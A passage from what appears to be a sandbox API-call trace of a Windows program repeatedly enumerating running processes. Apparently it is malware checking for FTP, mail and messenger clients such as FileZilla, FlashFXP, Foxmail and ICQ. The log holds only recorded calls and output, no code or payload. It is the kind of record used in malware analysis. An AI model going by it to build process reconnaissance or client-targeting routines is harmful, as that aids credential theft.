[0211.290] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0211.292] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xa1c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0211.295] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0211.296] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0211.298] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0211.336] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="9DC0.exe")) returned 1 [0211.338] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x778, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0211.340] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x610, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0211.342] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0211.344] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x518, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="powershell.exe")) returned 1 [0211.346] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x518, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0211.348] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x518, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0211.351] CloseHandle (hObject=0x1eb8) returned 1 [0211.351] Sleep (dwMilliseconds=0x64) [0211.389] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1eb8 [0211.422] Process32First (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0211.426] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x71, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0211.470] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0211.472] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0211.474] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0211.476] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0211.478] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0211.479] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0211.481] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0211.483] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.484] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.486] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0211.487] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.489] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.491] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.492] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.493] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.495] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.496] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.498] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0211.500] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0211.501] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x38, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0211.503] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0211.553] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.558] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0211.560] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0211.562] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0211.564] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0211.565] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0211.567] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0211.568] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.571] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0211.573] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0211.575] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0211.576] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0211.578] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.580] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x624, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="onlawyerseek.exe")) returned 1 [0211.581] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact believe worker.exe")) returned 1 [0211.582] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="partner.exe")) returned 1 [0211.584] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whole.exe")) returned 1 [0211.586] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="nation-choose.exe")) returned 1 [0211.587] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x514, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="insteadrecent.exe")) returned 1 [0211.589] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="side-end-death.exe")) returned 1 [0211.635] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="young every moment.exe")) returned 1 [0211.637] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="somethingvictim.exe")) returned 1 [0211.638] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="director_glass_possible.exe")) returned 1 [0211.640] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accept.exe")) returned 1 [0211.641] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ability-where-operation.exe")) returned 1 [0211.652] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="condition.exe")) returned 1 [0211.654] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="executive_anything.exe")) returned 1 [0211.656] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="movement indeed best.exe")) returned 1 [0211.658] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="memberheavy.exe")) returned 1 [0211.659] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gardenpolitical.exe")) returned 1 [0211.661] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="program-him-cell.exe")) returned 1 [0211.662] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="long_sense.exe")) returned 1 [0211.664] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="agreeinterestingreceive.exe")) returned 1 [0211.666] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x105c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0211.667] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1068, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0211.669] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1074, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0211.671] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0211.673] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0211.717] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0211.720] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0211.722] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0211.724] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0211.727] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0211.729] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0211.732] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0211.734] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0211.736] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, 